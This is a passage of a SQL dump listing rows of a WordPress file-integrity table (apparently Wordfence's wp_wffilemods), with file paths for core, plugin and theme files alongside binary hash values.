������mop�S�Tvr�n�','',0,'?'),('��\r\n�8n}��','wp-includes/rest-api/endpoints/class-wp-rest-menu-locations-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���sŽu+�B���','��uC[I�z��_)x��	?�c/�����','',0,'?'),('�$�W���W��qœ�!','wp-content/plugins/wp-cerber/assets/flags/ng.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k~\Z������C�ʟ�','����\"�-y��$5�k.no��H��|ӿ����','',0,'?'),('�//.\0����llO�(','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/Promise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jթn� ��M�\'','��7�H(_P�(\Z\n0|7\r��@Q!����/�','',0,'?'),('�6+<���W�e��P�','wp-content/plugins/wp-smushit/app/assets/js/smush-global.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�tiX̝/�`�>\"','�ecr^#�쥟=_�\\����Ჳ�7p�k��','',0,'?'),('�A��l�an���=3p�','wp-includes/wp-includes/images/crystal/text.png',0,'�� Ѳ��#�d�%�[�','�� Ѳ��#�d�%�[�','n1��0��<;�\n��Ip��~�f���⠸��z','',0,'?'),('�].�oo�ȦM-n	�','wp-admin/images/align-none-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�XC�)[���-�4�','�ߧ&QQ�p\"~�\Z8S׊����Y����S`','',0,'?'),('�l�.�}+�S�c�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&>qѪ���q�=U','�3�;*S�HK���Jyq��؏l��-\\ة��m	}','',0,'?'),('�vFKض���q�M�:�','wp-content/plugins/wordpress-seo/js/dist/schema-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�f�օ1$�T�y���','|����iJ|���\",\'ԫ����	?GK�Y�','',0,'?'),('�~�7W��`K)�y�\0','wp-includes/wp-includes/meta.php',0,'�6y��w���N�ш','�6y��w���N�ш','���W!�\Zس-�Y��}����M��W�e?','',0,'?'),('ԛ�a�����tr��','wp-includes/blocks/video/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n]=U���1��l','���3=����\r`~�\\�uF�R@73�/','',0,'?'),('Ԝd�&;0�;�}h��','wp-includes/blocks/columns/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�\Z��dMGV�7q�','̙���D}m���aC�l�C��FkXIUjw/�','',0,'?');
INSERT INTO `wp_wffilemods` VALUES ('Ԝ|�w�����6�/��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/th.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X\\��\'7���좣','�T�b�ui�1|?�?����g�n�b�sTI���','',0,'?'),('Իq�E�{���n���','wp-includes/blocks/verse/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y����Vq�Y�\n�','MbO<W\'8!����A��S�\r�G_n0���s�','',0,'?'),('Ի�K��\Z��y`mQ	�','wp-includes/wp-includes/class-wp-admin-bar.php',0,'�~�;1�q�h��Nu�','�~�;1�q�h��Nu�','g��)HH^�t�\\�(Ɵ9S��vI}�\n��\rY��','',0,'?'),('Կ���6�s�I�_���Z','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-term-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����j��NB','��`H]��իs�PMPH�c�O��PG9�5','',0,'?'),('�Ȇp���]4��L��q�','wp-includes/css/admin-bar.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܻ��_�2@���g��W','���@�~�=3O��@�c�}�DffW<�p:��','',0,'?'),('�Ș���r\'%@=\"�N b','wp-content/plugins/wp-cerber/assets/flags/co.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F/��.棛��1�1','œR,K)܅r�t�u;T�찱�J�)���A�6�','',0,'?'),('��p��S��`�]T]D�','wp-includes/css/dashicons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',J��/��n�R�~�','qԡ���c��q�l5/�3$˝T�GW�','',0,'?'),('�̆lҘ�\\�4�,C-�m','wp-includes/css/dist/block-library/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r;�����**���l�','jqv�=��82W���3&�K|;�+\n\\	IoR��','',0,'?'),('��̟��:H�Cbg*I;','wp-content/plugins/wordpress-seo/src/helpers/language-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2 ��8�Nɩ�:rq','�n\r��]����QE~�c8�w�u�RW�c','',0,'?'),('��gjGA��V�\0�','wp-includes/wp-includes/js/twemoji.min.js',0,'���װ�aL/S��T','���װ�aL/S��T','e�dimԺm\Z$V��v�%	���FO��aK\rŇS','',0,'?'),('���/�q��RR�|���','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R���!z@;�Ve����','�#��l�#�к;�	KAH9Q�@�	����B~�','',0,'?'),('�\rb�d/ӡ;�\Z�#x','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/EachPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�����/Dj#�`�Y��','�W��M����+��S5g�dU�[�~��k[','',0,'?'),('�X��$�a��B��^','wp-admin/js/user-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6|3����s�J:+IV�','nj�0B�Ƞ|�qO�	F����>��g������#','',0,'?'),('�0�8E{8_�P�`�� ','wp-includes/wp-includes/js/dist/html-entities.min.js',0,'x�l��m7��#��F','x�l��m7��#��F','�z�d��q�ٻ�ٿ���	l���w�5�M�','',0,'?'),('�2����_R��[��Y','wp-includes/blocks/code/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��\r�=�ɓ�mj��','\Z�IRl�d���;�G:�k2o$���P蔜�','',0,'?'),('�BImS��96�7���X','wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�G�M�!ex9��','�!ZgbZ��FZ���z����|�YE�	���','',0,'?'),('�gֿ��m�㋣��I','wp-includes/js/dist/data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�}��G�%���K�_','\0��Y�u>(��l.pzӍ�-Ee��G_`�','',0,'?'),('�k\"��O���$N)�$�','wp-content/plugins/wordpress-seo/src/helpers/primary-term-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(\r^�hA!Dj�9��','Lm{�\r?pg rb�%�i�B���a�|S��S�Ä�G','',0,'?'),('�p8��UY?(?9ـB','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ٌ�M!�\Z���','�N=x�p9Ԧp��H��сbᚕ�US�1\n�[�','',0,'?'),('�p�sZZ�#�N7��e�','wp-includes/css/dist/block-editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�^��]k��Rg�����','�K<NJ�VhKwlz���n�:�W�\0ؽ�X','',0,'?'),('�s[�y#*��,\0Q�\'','wp-content/plugins/wp-cerber/assets/flags/im.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o���\Z�\r�D��Sy9','Y\Z=:�XQJf�fst=��vӻn��A\"��|�','',0,'?'),('�uG#�)�|�^���6','wp-includes/Requests/Exception/HTTP/511.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݧ3�*�=�A>�9���','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('Շ\n!B|rC����','wp-includes/wp-includes/customize/class-wp-customize-header-image-control.php',0,'<�\0W>$����l�^ҳ','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('ՌF�Q!��oUw���J','wp-content/plugins/wp-smushit/app/modals/updated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<A�����<��h�?�','�j�N=��q4�.�o�9�=�J��Fu7⽏�S','',0,'?'),('ՕL��+7>$ɡ4�]','wp-includes/blocks/post-comments-form/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','쮛��9\n.ha��=8�','����b���?C�=P��\n�E�H�g�pE','',0,'?'),('ջO�sU���ȶTПa','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Sgͻ\rn��?�_','�6;�TIgI�M�\\.�cN ��������_S�','',0,'?'),('���Ȩ��r��%Mè','wp-includes/blocks/file/view.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&���6�\"��}N','�vW�s���-8�V~ŀ��n�w�3�p9','',0,'?'),('��v#cF_+c.S�s','wp-content/plugins/wp-smushit/core/integrations/class-composer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KG\n��O�L\r	9D\r�	','��U@&���ԑ�BWp�䁉oS��.�V	^','',0,'?'),('�K2;�<D����kub','wp-content/plugins/wordfence/lib/wfStyle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���1_�e�k2R����','j�颎����_c�632�3օ�]Gs}.\n','',0,'?'),('���ͤ6�\0/��k���','wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�P}.��7��$,zU','�0ʌ�u��!/q!�e�D��b!Vҳ�l�z���','',0,'?'),('�J�?�,����Q�6�','wp-includes/blocks/read-more/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','у�[��	x\0~�0�W�','L��;H�o��B��d���J�G�݁I�u��','',0,'?'),('�	����AR�Z\Z��','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(b�=ؗ�\r�)y�','#��QiQ&��xXpvۛ\n�X��\\շ���d`','',0,'?'),('��1�*Ui[�8�^�=','wp-includes/wp-includes/class-walker-comment.php',0,'I#�h�Z~�����@��','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('�R�|1�cr)��*','wp-includes/wp-includes/js/admin-bar.js',0,'�\r�c����@p�','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('����Q��;�CQ-�','wp-content/plugins/wp-cerber/assets/flags/sk.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[u{������hwZ�M','2r�Jc�������S�u����k^)~M���','',0,'?'),('��xl��j���KK�H','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-article.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0^�h�z�}���S�n7\0','\Zl��B�S�H�yk�(�i�$�%&8>Ϣ|�[Zo','',0,'?'),('�5�x=�KD���W','wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<���Di	��','��չ�c�.��\r8Dם3i�\n��li�Z��','',0,'?'),('�9��/u:�zS���','wp-content/plugins/wp-cerber/assets/flags/ci.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gń9dx�n]3���5','��\r^�x���5\r���z�ȑ/���谬 N ��','',0,'?'),('�<������$�h�','wp-includes/wp-includes/js/jquery/jquery.masonry.min.js',0,'��@`���&n|�}A��','��@`���&n|�}A��','�\\ۙ����	}M�g� �$�0� [���B','',0,'?'),('�<�8�;p� x�TG','wp-includes/css/dist/edit-widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GȩzUkB3� M^��','=*��(TCM�lu���i44Hܖ�_AYL�G��','',0,'?'),('�F��8m�u@_�XT�','wp-content/themes/twentytwentythree/parts/footer.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W	�o9i���[��r','��,	����׼b$�O����`I��','',0,'?'),('�Q|�O\\��iqʼnu0','wp-content/plugins/redirection/api/api-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��Y�|�r���L�','�+�0:� ����+G���Vb+�o]','',0,'?'),('�Xډ|�8���}�B�','wp-includes/js/tinymce/plugins/link/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V\\\n]��K�s\'�','\Z�>��I�S�е�����v�,��q�U����^','',0,'?'),('�Z�	r!ޏf���	�','wp-includes/images/icon-pointer-flag.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,���E^�j`\'','oq��9��a{)h}=#�����T�ק��','',0,'?'),('�el�Z��!f�3��','wp-content/themes/hitmag/inc/kirki/deprecated/classes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\0V����\no��l�}','�l�myU�Z��b�i����CX.���(7ּҩ','',0,'?'),('�eƙ��}ǜMWԻ-��','wp-content/plugins/wordpress-seo/src/presenters/robots-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�މ�I_����Pr�Y�','X��WJ�ת�oD�9C�40�7P�a Q','',0,'?'),('�j���#�Ӳ��X%�I','wp-includes/block-supports/elements.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V㌐u7��+�J�M','�!ԟ����ד]�q����)mh׉��Ī�','',0,'?'),('�mዞj���W�Bv|','wp-includes/blocks/template-part/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"/�h��O�k@ޤ','�%��X仍(��Kb�6q�F��*F30]����h','',0,'?'),('�oҨ*K��o�7{� <','wp-includes/ID3/module.audio-video.matroska.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�X�T�pP�z','u�P�k�_?���(��]\\��O59�a{�n���','',0,'?'),('�rY�S�xwDY˚J�[','wp-includes/images/media/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R׬˂���ôʼnh�H','{�� [K��\0!�긽��/�\\�lw.����','',0,'?'),('�t�Q��oi�:��\r�','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',0,'\'�U巃�� qD�F��H','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('�v��&�M�|=��h`�','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.js',0,'El�*Ie��NZ�aK��','El�*Ie��NZ�aK��','�K�+|���̫M5J�����y�0�It�lol','',0,'?'),('֋�8�[�����0�ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�N��z���	ܿ�','ŗ�5��bDG�!����{t�*\"���y�','',0,'?'),('֌��q�ó�X�[���','wp-includes/class-wp-feed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�o�%\Z�/b�ud�','g��(H�v�\"$X8�s+�\"Z�*�?�e�J','',0,'?'),('֣5d�w�Ƹ���rҔ','wp-content/plugins/wp-cerber/assets/flags/bw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�;�\r�P�•��','�\roq-eVWA2/QB��\"�4%�5H<�x���	D','',0,'?'),('֮�mN�GA�s��.','wp-content/plugins/wordpress-seo/src/generators/schema/organization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5��Y��t%�䟼','?�МA��n�X�iP���\Zdr������<(','',0,'?'),('ֶ��9؞f�po3t','wp-includes/class-wp-admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܳ��T�{$I6n_��	','\0W[�F�ɳ{�y=C:��Y�%�+��7��V','',0,'?'),('ֽ�B��m�O�*�:q�z','wp-content/plugins/wordpress-seo/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�J��7�AU�HGr','% �T��S����p��v8��;�!=G��*','',0,'?'),('ֿ�PХ��l�H�/Й�','wp-includes/wp-includes/js/dist/block-library.js',0,'�INo<�Rz�I����','�INo<�Rz�I����','�Op�2�j�|:,��a:�weҽ�H�S�/�.','',0,'?'),('��J��!�[W6ݧ�','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8�w�VX�8��~$�','����%����m���򳚫-[�\0:�&��','',0,'?'),('���B��W���k\rZ{��','wp-includes/sodium_compat/lib/ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a3�pwypo�|i��','$�	3����o3�83���i�Q�\Z)[�e�','',0,'?'),('�ߢ\Z�s>����\'�','wp-content/plugins/redirection/locale/redirection-es_VE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��t����@1�F��','B,²�v!���l�m�����/�G,6�','',0,'?'),('���u��IN��z�[�','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VɅ)y��9�2q�','�����P�=����X�5�*��\r6VsE/�%','',0,'?'),('���΀y\"���=]�4�','wp-includes/wp-includes/js/autosave.js',0,'\0|w{���5l�D\nө��','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('�a�!57�	���5c','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�!m]\'�x�_�','�W���I�Y��T�įQ�.0(?��F���f#|�M','',0,'?'),('�%�u�c�p֖��]�','wp-includes/blocks/calendar/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\n������Uz�PU��','���2aC�[[��n�k�2!\ZR3L�.6l�R�','',0,'?'),('�C��Wݩ��cq��l��','wp-content/plugins/wp-cerber/assets/flags/ao.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A� �C���W�]B�\Z','\'�W�[WV󽙀���e���5y�n����}�,','',0,'?'),('�Gȩ��6����\0Y','wp-admin/includes/class-wp-posts-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�G�{Z1�Ń�','��<ax���Z̚�G�$=5�x�����h7','',0,'?'),('�I�	J��a~R��Z�','wp-admin/includes/class-wp-application-passwords-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��NYNAM�?��G�\Z','�H�2p�L�q�&-:R�ʅS`����#+�D�','',0,'?'),('�M\0���c����_d�','wp-admin/includes/class-file-upload-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=.@��2���rO0�I�','dʹ]��}�!�`�0����h�O\\��dE�U�1','',0,'?'),('�X�J�K�3��F~�','wp-content/plugins/wordpress-seo/admin/views/js-templates-primary-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kch��κmG��Oc','kz�`��&`�+�\rƈ�$F��5Ė[|n�','',0,'?'),('�b #�z�Q�O*)��','wp-content/plugins/wp-smushit/_src/react/views/webp/free-content.jsx',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǔ��bYQ\r�\n�','8�_��*�����z -6O\"2�B�΋�E�-�','',0,'?'),('�f�k[x���� \\�/Y','wp-includes/js/dist/redux-routine.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>髗~��D\rq�\\�o','1Y<c`�����\nl���xa}�[���Ȯ���','',0,'?'),('�v\"6�`�vy�H����','wp-content/plugins/wordpress-seo/src/integrations/third-party/w3-total-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dX���E�%�E�E�',',��;Q��]�:ŭ��\r{#~�㯎�i\\$�� ','',0,'?'),('�w�h]�á�&�wM��','wp-includes/class-wp-network-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��Uˬ��op~g]H','cXӟ[����G��(\r��]��raF�<��n�','',0,'?'),('�w��L��<qoj��|�','wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tb1M�w��W�4�[?','I\n���4sD����|��x�y��pe�M̀��M','',0,'?'),('�{��wk5�%����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6N�?l�1���FsT^','�\0+\"\"��:*8l��Ia�-(��/\rsL�','',0,'?'),('ם�X�s�;���:\Z�','wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-custom-archive-settings-importing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0�G�QG��G�','H[i�<E��-��O�wV�m�s|_xSw�hp_ˏ','',0,'?'),('מ�y�7mE5���O_�','wp-admin/js/media.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n���L\"�j �u��A','�Xm�C��R�\Z_rZVm3��sy@�\"�1#','',0,'?'),('ש���c�#�|���','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-published-time-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�7�S�!�-j���','�4^��C]��3��&���k��{T��rYj;','',0,'?'),('�Ć��c��ij�B;�','wp-content/plugins/wp-cerber/cerber-pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��R���\\R�\n�',';]N#_T�bא�\0�or]�eg�q�c�V$o','',0,'?'),('��j0���w�E}®R�','wp-admin/css/wp-admin.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�Upʓ�H�WtP!�H','�^���E-�R�����\'#?�le��mL0�kU@�','',0,'?'),('��Y��O�M)|@x���0','wp-content/plugins/wp-cerber/assets/flags/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']̧%W?,OS�c�rs�','�޶#��` CUꦭ���W�5M�p1�\Ze\r���','',0,'?'),('��^�u����}�G��','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��΁~͟��ak��','u\Z�g$}o����bĄ��+\r��\n���8�','',0,'?'),('���M����R�N�a �','wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԅ����Gy�$���&','��\\�S/�3��)nb��pz�춲2?Tƕ�4','',0,'?'),('�fw!����k	�Y�_','wp-content/plugins/wp-smushit/app/views/nextgen/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̪i$��cm�T6��Y','?\0������,Ga��(�d��]E�Q�N�}���','',0,'?'),('�q�`Z�\Z�xu��','wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php',0,'��-r�jiI�أe�b','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('��\Zv�I:wm�\'~K-','wp-includes/ID3/module.audio-video.riff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ș�A�=n�b��]]',')��š�#CmMh�\n�U0:�u~��(3YT�','',0,'?'),('�\Z#�]-c�Ã���','wp-content/plugins/wordpress-seo/css/dist/workouts-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[})/�d}�8�%�z ','z�u-��_H��͹����x�U�0�G�i@� i6[','',0,'?'),('�%tb���BH0�<T','wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',0,'�%�X�������`йKZ','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�&�Zh�$�Éo�','wp-includes/class-json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ifI�3A@��[֤N@','\\ǿ3NԘ^�I��-\\.�-y1�\0�h$���','',0,'?'),('�(��K�o��5F','wp-content/plugins/wordpress-seo/js/dist/term-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]p��8�y�R�b[�','\Z�T<���?��C�\'Z�v��f��ύ|cs��','',0,'?'),('�8/B��$8���`m�','wp-includes/js/imgareaselect/jquery.imgareaselect.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��?��ES+�','���,��OT[9�pm��Ỵ�Ó,�����=f�','',0,'?'),('�<5�:[v3Y� �$�:','wp-includes/wp-includes/ms-default-constants.php',0,'&�%�M�A�b���Y�','&�%�M�A�b���Y�','_%������ ��+�g��`���}<���','',0,'?'),('�A�h)I�\Z]Gr��E','wp-admin/includes/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�����&ÞE�1v5','6.�)GP�r�cb�e��m �#��jW��}픇','',0,'?'),('�C>��J����w��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѡ�F�hO\nȆ=�b�','�NrR�\0�Λ$�FN�Y���C%��m�\rK*�','',0,'?'),('�J=R\'���t^�}�\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��H','n�p��ʅ���G��0�6Kq�J]����J�','',0,'?'),('�M&�3\r�3CMaQ{','wp-admin/images/yes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��7܉�\rqZ�Qk','�=�Q��G���9%�K���,�\r�\ZF�y���','',0,'?'),('�T��@\'�L� \\����8','wp-content/plugins/wordpress-seo/src/values/indexables/indexable-builder-versions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�z3�gF��;�Q','�fp��OC/ƥ��S�Dݍՙ\Zo��szP��f�','',0,'?'),('�V��5�<�\0���v��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΤX(��-���','��\\�:����-�����e&��g��m�r','',0,'?'),('�[%���X���<��r','wp-content/plugins/wordpress-seo/src/config/migrations/20200430150130_ClearIndexableTables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�!Wp᳊���Ωo','�zT�j<��1tk0F3D-�̾~4�b��;N,\'�','',0,'?'),('�g6��\'R��K�o��','wp-includes/wp-includes/images/smilies/icon_biggrin.gif',0,'�K��Jr��:�]kI�|','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('�kڋ0Z���s��','wp-content/plugins/wp-smushit/core/class-installer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6vB�\r\'����}��','!V!Q�7�t�&L��6�n.V��=\\ec}���^9','',0,'?'),('�o�ǣ�	ף�f0�Y','wp-includes/SimplePie/Core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ز3aݩ�0)��_�S','���760�w8��([���o�W��K��4d���','',0,'?'),('�v����\r�&X��','wp-includes/js/jquery/ui/selectable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZB���R;�n�+','�-x�a�x�7�=mY&��*��^ec���L','',0,'?'),('�x��βЦ��A	�<�','wp-content/plugins/wordfence/lib/wfCrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�R`�����9|�e','U�͊�s��ds�9;�C�O���Ȥ�@','',0,'?'),('ؠ��^y������v�','wp-includes/wp-includes/js/jquery/ui/autocomplete.js',0,':dL�*�E�&*!',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('خ츲�r�����','wp-content/themes/hitmag/inc/kirki/field/class-kirki-field-select2-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�0Z@1���9�R�','��@�8��FgI�^�T%\r	���8%r�z','',0,'?'),('ر�-�_}Z�h��\n�\Z','wp-admin/includes/class-walker-nav-menu-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','خ\\��*�wᑔ~ h��','�!�[mV��A���r�5T�Q������5r0>�z','',0,'?'),('ؽ�)��uҶ�ew��l','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mhOല�f�.I','�o�O�b�9_��b�-4��-�x%�T���5E9\'�','',0,'?'),('��=)8�{�\0Z�g(�{�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/BadResponseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l��\Z��V!��BG��5','n)�,�Ϭ�\0Ͳo�p� dop� 